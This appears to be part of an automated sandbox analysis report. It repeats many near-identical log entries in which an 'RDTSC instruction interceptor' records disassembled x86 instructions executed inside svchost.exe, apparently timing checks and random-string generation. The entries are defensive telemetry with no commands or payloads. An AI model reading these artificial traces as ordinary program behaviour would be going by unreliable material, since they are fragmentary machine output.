Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59524h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FBB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 